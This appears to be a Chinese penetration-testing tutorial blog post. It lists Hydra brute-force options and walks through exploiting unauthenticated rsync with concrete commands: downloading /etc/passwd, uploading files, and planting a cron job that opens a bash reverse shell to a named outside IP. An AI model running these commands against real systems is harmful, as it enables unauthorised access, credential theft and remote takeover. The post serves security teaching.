服务安全-测试&应用协议-Hydra工具

最新推荐文章于 2024-06-17 10:30:00 发布
最新推荐文章于 2024-06-17 10:30:00 发布
阅读量565 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65336233/article/details/127618208
版权

应用服务安全测试流程:

1、判断服务开放情况-端口扫描&组合应用等

端口扫描:利用Nmap和Masscan等工具进行扫描并发现所开放的端口。

组合应用:根据已知信息对某些服务的开放进行猜测。

       举例:如果开发语言的PHP,那么很有可能数据库为MySQL

2、判断服务类型归属-数据库&文件传输&通讯等

服务类型:根据已知的端口去发现目标所开放的服务。

3、判断服务利用方式-特定漏洞&未授权&弱口令等

特定漏洞:开放服务根据不同的版本已经公开的所存在的漏洞。

未授权:利用某些工具或方式发现漏洞并进行有效的利用。

弱口令:密码过于简单或是单一所造成的漏洞

文件传输&远程控制

文件传输

FTP:文件传输协议,开放21端口。尝试利用Hydra工具进行弱口令爆破。

Rsync:Linux的文件传输协议,开放873端口。存在配置不当未授权访问

远程控制

RDP:Windows的远程控制协议,开放3389端口。尝试利用Hydra工具进行弱口令爆破。

SSH:Linux安全外壳协议,开放22端口。尝试利用Hydra工具进行弱口令爆破。

Hydra&Rsync漏洞解析

Hydra-FTP&RDP&SSH

工具下载链接: GitHub - vanhauser-thc/thc-hydra: hydra

hydra是一个自动化的爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可。

-s PORT 可通过这个参数指定非默认端口。

-l LOGIN 指定破解的用户,对特定用户破解。

-L FILE 指定用户名字典。

-p PASS 小写,指定密码破解,少用,一般是采用密码字典。

-P FILE 大写,指定密码字典。

-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。

-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。

-M FILE 指定目标列表文件一行一条。

-o FILE 指定结果输出文件。

-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。

-t TASKS 同时运行的线程数,默认为16。

-w TIME 设置最大超时的时间,单位秒,默认是30s。

-v / -V 显示详细过程。

server 目标ip

service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。

未授权访问-Rsync

rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。

利用:

-读取文件:rsync rsync://123.58.236.76:45854/src/

-下载文件:rsync rsync://123.58.236.76:45854/src/etc/passwd ./

-上传文件:rsync -av passwd rsync://123.58.236.76:45854/src/tmp/passwd

反弹shell:

1、获取信息:

rsync rsync://123.58.236.76:12177/src/etc/crontab /root/cron.txt

2.创建文件

touch shell

#!/bin/bash

/bin/bash -i >& /dev/tcp/47.94.236.117/5566 0>&1

chmod +x shell

3、上传文件

rsync -av shell rsync://123.58.236.76:12177/src/etc/cron.hourly

4、等待接受反弹

@墨竹
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络测试工具--猫抓工具
11-15
网络测试是确保网络性能、稳定性和安全性的关键环节,而“猫抓工具”(通常是Catapult Hydra或Wireshark等抓包工具的别称)是网络测试中不可或缺的利器。本文将深入探讨猫抓工具的功能、使用方法及其在网络测试中的...
开源项目-ory-am-hydra.zip
10-29
总的来说,ory-am-hydra是一个强大的工具,对于那些寻求高效、安全的身份管理和授权解决方案的开发者来说,它是一个理想的选择。利用其丰富的功能和优秀的性能,你可以轻松地为你的应用添加认证和授权功能,同时享受...
黑客必备工具Hydra的完整安装和使用指南
qq_35358965的博客
05-12 5123
https://github.com/vanhauser-thc/thc-hydra下载最新版本的Hydra下载完成后,将压缩包解压到任意目录。以上就是Hydra的安装和使用教程的详细内容。使用Hydra进行暴力破解时,请务必遵守法律和道德规范,并确保你有所有必要的权限和授权。Hydra的模块是一组支持特定协议服务的功能。完成上述步骤后,Hydra已经成功安装在你的电脑上了。你可以从Hydra的官方网站(表示目标主机的IP地址或域名,
黑客入门破解网络密码常用九个方法
m0_59162248的博客
02-23 6088
个人网络密码安全是整个网络安全的一个重要环节,如果个人密码遭到黑客破解,将引起非常严重的后果。比如,银行卡账户密码被盗,你就给别人打工了。所以,增强网民的网络安全意识是网络普及进程的一个重要环节。常言道:知己知彼方能百战不殆。因此,在个人采取安全措施来保护自己的网络密码之前,有必要先了解一下流行的网络密码的破解方法,方能对症下药,下面我就介绍一下几个主要的网络密码破解。
暴力破解工具hydra使用教程,黑客必备!
最新发布
logic1001的博客
06-17 1000
Hydra中文名称九头蛇,是著名黑客组织thc的一款开源的暴力密码破解工具,可以爆破多种服务的账号和密码,包括 Web 登录、数据库、SSH、FTP 等服务,支持 Linux、Windows、Mac 平台安装, Kali Linux中自带 Hydra
使用hydra进行SSH爆破
qq_53218512的博客
06-02 5711
mobaxterm 的功能非常全面,几乎提供了所有重要的远程网络工具(比如 SSH、X11、RDP、VNC、FTP、MOSH 等),以及 Windows 桌面上的 Unix 命令(bash、ls、cat、sed、grep、awk、rsync 等),登录之后默认开启 sftp 模式。命令的意思是:使用bin.bash里面的shell,用nc命令反弹shell,反弹到攻击机的7777端口,-e代表需要执行的指令,这里是要执行/bin/bash。发现通过计划任务执行了bash/tmp下面的task.sh文件。
常见的用户密码加密及破解方法
weixin_64051447的博客
04-26 2297
这种表就是“预计算哈希链”。(4)特殊的单向HASH算法,由于单向HASH算法在保护密码方面不再安全,于是有些公司在单向HASH算法基础上进行了加盐、多次HASH等扩展,这些方式可以在一定程度上增加破解难度,对于加了“固定盐”的HASH算法,需要保护“盐”不能泄露,这就会遇到“保护对称密钥”一样的问题,一旦“盐”泄露,根据“盐”重新建立彩虹表可以进行破解,对于多次HASH,也只是增加了破解的时间,并没有本质上的提升。当然,对于已经泄露的密码,还是需要用户尽快修改密码,不要再使用已泄露的密码。
暴力破解工具hydra
OfficerGoodbody的博客
09-01 679
hydra参数详细说明 hydra [[[-l LOGIN|-L FILE] [-p PASS|-PFILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-wTIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46][...
Python库 | shipchain-hydra-1.0.4.tar.gz
03-10
解压shipchain-hydra-1.0.4.tar.gz,开发者可以获得源代码文件,通常包括`.py`文件(Python源代码),`README`文件(项目说明),`LICENSE`文件(许可协议),以及可能的测试文件和配置文件。 Python库通常遵循一定...
靶机(potato-suncsr)——ssh暴力破解(工具包括:cewl(爬虫)、hydra(九头蛇)、nmap、arp-scan、dirsearch)
一大口木的博客
04-11 2184
第一次使用靶机,很好玩,我感觉靶机就是有漏洞的一个虚拟机,你可以在vmware里打开,然后用kali攻击,获取权限,或者盗取信息链接: https://pan.baidu.com/s/1KFYQkEP_KAr3lJZOfQ2-Ig?pwd=2cbh 提取码: 2cbh 复制这段内容后打开百度网盘手机App,操作更方便哦开始正题。
centos7安装弱口令破解工具hydra
什么TM的叫惊喜
08-05 838
1、下载压缩包 wget https://github.com/vanhauser-thc/thc-hydra/archive/master.zip 2、安装gcc和解压命令 yum -y install gcc libssh-devel openssl-devel yum install -y unzip zip 3、解压,进入解压目录 unzip master.zip cd thc-hydra-master/ 4、编译运行 ./configure make &&make install
暴力破解-hydra-8.1(windows版)
07-17
这个不是一个图形界面的软件,需要在命令行界面执行。 在hydra文件夹下按住shift点击鼠标右键,选择终端打开(win10是在此处打开powershell) ctrl+r 输入cmd 然后进到这个目录也是一样的。 解压即可无需安装。 https://blog.csdn.net/qq_35311107/article/details/81083981 这是我自己用的心得 赠与新人
hydra-v7.3
10-24
目前网络上最新的windows版本为hydra-V5.4,本人将源代码编译之后提供最新的hydra-v7.3版本。支持TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, LDAP, SMB, SMBNT, MS-SQL, MYSQL, REXEC, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, Cisco auth, Cisco enable, SMTP-AUTH, SSH2, SNMP, CVS, Cisco AAA众多登陆方式的密码破解。
暴力破解工具Hydra 使用
大哥一声吼
07-09 1663
kali 自带的hydra 工具,直接使用即可,不再赘述安装过程 常用命令如下 hydra -l user -P passlist.txt ftp://192.168.0.1 hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5 hydra -l admin -p password ...
远程桌面一直被人爆破的解决思路
Qwertyuiop2016的博客
11-17 7023
某天远程自己的电脑发现登不上了,错误信息如下:开始也没在意,后面出现了好几次才反应过来。查看了Windows日志发现一直有人在尝试登录这台电脑,因为3389端口已经映射到了公网IP。
介绍6款密码暴力破解工具
logic1001的博客
04-06 2747
暴力破解就是通过不断穷举可能的密码,直至密码验证成功,暴力破解分为密码爆破和密码喷洒,密码爆破就是不断的去尝试不同的密码,密码喷洒就是通过已知密码不断去尝试账号。下面介绍6款常见的暴力破解工具。01hydraHydra(九头蛇)是THC组织开发的,是一款非常流行的密码破解工具,可以对多种服务的账号和密码进行爆破,包括 Web 登录、数据库、 SSH、 FTP 等服务,支持 Linux、Windows、 Mac 平台安装,其中 Kali Linux中自带 Hydra
一次真实的应急响应案例(Ubuntu)——暴力破解、写入ssh公钥留后门、植入GPU挖矿程序——事件复现(含靶场环境)
W小哥
03-01 7835
一、SSH协议介绍 SSH(Secure Shell)是一套协议标准,可以用来实现两台机器之间的安全登录以及安全的数据传送,其保证数据安全的原理是非对称加密。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议,主要用于给远程登录会话数据进行加密,保证数据传输的安全。 危害: SSH口令长度太短或者复杂度不够,如仅包含数字,或仅包含字母等,容易被攻击者破解,一旦被攻击者获取,可用来直接登录系统,控制服务器所有权限。 一、事件背景 某天客户反馈:Linux服务器有异常连接,疑似被入侵。(真实案
Hydra常用命令
weixin_63286108的博客
05-11 2739
Hydra 常用功能选项( 参数)说明 -l: 指定单个用户名, 适合在知道用户名的情况下爆破密码时使用 -L : 指定多个用户名, 参数值为存储用户名的文件(字典)的路径(建议为绝对路径) -p: 指定单个密码, 适合在知道密码的情况下爆破用户名时使用 -P : 指定多个密码, 参数值为存储密码的文件( 字典) 的路径(建议为绝对路径) -C: 当用户名和密码存储到一个文件时使用此参数。注意: 文件(字典) 存储的格式必须为" 用户名:密码" 的格式 -M : 指定多个攻击目标, 此参数为存储...
虚幻4的软件安全渗透测试一般用什么工具
05-25
1. Burp Suite:这是一个常用的Web应用程序渗透测试工具,可用于检测和利用虚幻4中的Web漏洞。 2. Metasploit:这是一个开源的渗透测试框架,可以用于自动化渗透测试,并发现和利用虚幻4中的漏洞。 3. Nmap:这是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值